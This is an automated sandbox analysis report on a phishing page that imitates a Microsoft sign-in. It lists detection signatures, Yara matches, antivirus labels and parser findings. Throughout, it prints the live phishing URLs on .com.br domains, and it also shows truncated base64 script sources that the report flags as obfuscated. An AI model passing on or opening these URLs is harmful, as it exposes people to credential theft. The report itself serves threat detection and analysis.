Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cd

Overview

General Information

Sample URL:https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cd
Analysis ID:1640767
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish54
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains obfuscated script src
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 1428 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3340,i,1354710186197194451,1516178957246450856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3440 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7028 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cd" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2.11..script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    1.2..script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      1.4.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        2.5.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          2.7.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            Click to see the 2 entries
            No Sigma rule has matched
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://hapiinenstys.criadordeconexoes.com.br/Avira URL Cloud: Label: phishing
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly93d3cub2ZmaWNlLmNvbS9sb2dpbiM=Avira URL Cloud: Label: phishing
            Source: https://hapiinenstys.criadordeconexoes.com.br/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2hhcGlpbmVuc3R5cy5jcmlhZG9yZGVjb25leG9lcy5jb20uYnIvIiwiZG9tYWluIjoiaGFwaWluZW5zdHlzLmNyaWFkb3JkZWNvbmV4b2VzLmNvbS5iciIsImtleSI6InFWUDg3RWFGR0NRbiIsInFyYyI6bnVsbCwiaWF0IjoxNzQyMjI5NzYyLCJleHAiOjE3NDIyMjk4ODJ9.bpFU2t6kMODAzyr1sHzSD1xCGWuz2a7omLxO3ziToVgAvira URL Cloud: Label: phishing
            Source: https://hapiinenstys.criadordeconexoes.com.br/favicon.icoAvira URL Cloud: Label: phishing
            Source: https://hapiinenstys.criadordeconexoes.com.br/common/GetCredentialType?mkt=en-USAvira URL Cloud: Label: phishing

            Phishing

            barindex
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp2M29Ub2JqdGllQnRqd0pQNHdBTmZwbjlCNWdKVXN1TkFibFNmSGtJTlRtcVhPQ2dZRGtxUU9ZX2cmeC1jbGllbnQtU0tVPUlEX05FVDhfMCZ4LWNsaWVudC12ZXI9OC4zLjAuMA==&sso_reload=trueJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'hapiinenstys.criadordeconexoes.com.br' does not match the legitimate domain 'microsoft.com'., The domain 'criadordeconexoes.com.br' is unrelated to Microsoft and appears to be a generic or unrelated domain., The subdomain 'hapiinenstys' is unusual and not associated with Microsoft., The presence of an email-like input field 'wq31bf@oxkfqx.com' suggests potential phishing, as it may be used to collect sensitive information. DOM: 2.8.pages.csv
            Source: Yara matchFile source: 2.11..script.csv, type: HTML
            Source: Yara matchFile source: 1.2..script.csv, type: HTML
            Source: Yara matchFile source: 1.4.pages.csv, type: HTML
            Source: Yara matchFile source: 2.5.pages.csv, type: HTML
            Source: Yara matchFile source: 2.7.pages.csv, type: HTML
            Source: Yara matchFile source: 2.9.pages.csv, type: HTML
            Source: Yara matchFile source: 2.8.pages.csv, type: HTML
            Source: 2.60.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behaviors, including dynamic code execution through the use of the `Function` constructor and the ability to modify the `sRandomBlob` property, which could potentially be used for data exfiltration or other malicious purposes. The script is also heavily obfuscated, making it difficult to analyze and understand its true intent. These factors contribute to a high-risk assessment.
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp...HTTP Parser: Number of links: 0
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp...HTTP Parser: Base64 decoded: 4f0b0a4a-29ca-42e3-8f03-1a3dd7dfd538f547b57a-3730-406a-a0d8-b5efa22e6ac1
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaHTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gY3VzdG9tRnVuY3Rpb24oKSB7CiAgICBpZiAoIWRvY3VtZW50LnF1ZXJ5U2VsZWN0b3IoIi5jdXN0b20tY2xhc3MiKSB8fCAhZG9jdW1lbnQucXVlcnlTZWxlY3RvcigiLnJvdGF0ZS1jbGFzcyIpKSB7CiAgICAgICAgdmFyIG5ld0RpdiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbn
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp...HTTP Parser: Title: MOD-xq7a2ts6 does not match URL
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp...HTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp...HTTP Parser: <input type="password" .../> found
            Source: https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=cebc15b3c86fa69be7285330a66657219c1287ff53c1f7059daa44d10ef1952d669e891ae8484a544c8d16f0be8cc4af98aec84015acb9fd06d2a3ccc941854cHTTP Parser: No favicon
            Source: https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=cebc15b3c86fa69be7285330a66657219c1287ff53c1f7059daa44d10ef1952d669e891ae8484a544c8d16f0be8cc4af98aec84015acb9fd06d2a3ccc941854cHTTP Parser: No favicon
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGp...HTTP Parser: No favicon
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGpHTTP Parser: No <meta name="author".. found
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1pZD0zOTE5ZDJiOC1lZjIwLTQ0MDctOTI4Ni1jYjNlOWMxYWJhNzEmc3RhdGU9WHY5MFNmNENmWlFJcFE3WFFDQmFMUHYwMTRWcVd4dEk2d3dpbDBfZXdPRVNEc1BfQS1mOGEtN29CcTlQejdKZDhQcF9qcHJLQm1lR3ZodDdvU3RwR1ZUR1NlYkpacUdvNE1oN3h6eWdOZlh5V3ljQzFxSktEZ1ZLcV8xX3U1T0w4VFd5OFJnbWpBN3lzLS1RZDFhTjktSUFHc2F4aDVnWHpEYWZsZmp1NzBLZkc4eWMtamRHM2t2MzZWclY2THVXMGEwTkpaOTN4aHdnUXhkVG51S3NraDBaZnhYMGpHTTP Parser: No <meta name="author".. found
            Source: https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvdjIuMC9hdXRob3JpemU/Y2xpZW50X2lkPTQ3NjU0NDViLTMyYzYtNDliMC04M2U2LTFkOTM3NjUyNzZjYSZyZWRpcmVjdF91cmk9aHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRmxhbmRpbmd2MiZyZXNwb25zZV90eXBlPWNvZGUlMjBpZF90b2tlbiZzY29wZT1vcGVuaWQlMjBwcm9maWxlJTIwaHR0cHMlM0ElMkYlMkZ3d3cub2ZmaWNlLmNvbSUyRnYyJTJGT2ZmaWNlSG9tZS5BbGwmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3Qmbm9uY2U9NjM4Nzc4MjY1NjUxMDA2ODgwLk5HWXdZakJoTkdFdE1qbGpZUzAwTW1VekxUaG1NRE10TVdFelpHUTNaR1prTlRNNFpqVTBOMkkxTjJFdE16Y3pNQzAwTURaaExXRXdaRGd0WWpWbFptRXlNbVUyWVdNeCZ1aV9sb2NhbGVzPWVuLVVTJm1rdD1lbi1VUyZjbGllbnQtcmVxdWVzdC1